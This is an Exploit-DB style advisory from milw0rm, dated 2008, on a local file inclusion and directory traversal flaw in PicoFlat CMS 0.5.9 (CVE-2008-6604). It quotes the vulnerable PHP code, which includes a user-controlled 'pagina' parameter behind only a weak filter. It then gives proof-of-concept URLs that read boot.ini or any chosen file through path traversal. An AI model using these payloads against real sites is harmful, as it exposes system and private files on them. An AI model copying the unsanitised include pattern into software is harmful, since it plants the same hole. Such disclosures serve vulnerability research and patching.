PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion

Author: gmda
type: webapps
platform: php
port: 
date_added: 2008-05-28 
date_updated: 2016-12-02 
verified: 1 
codes: OSVDB-53320;CVE-2008-6604 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPicoFlatCMS_27012008.0.5.9.zip

---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- gmda@email.it -->


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

# milw0rm.com [2008-05-29]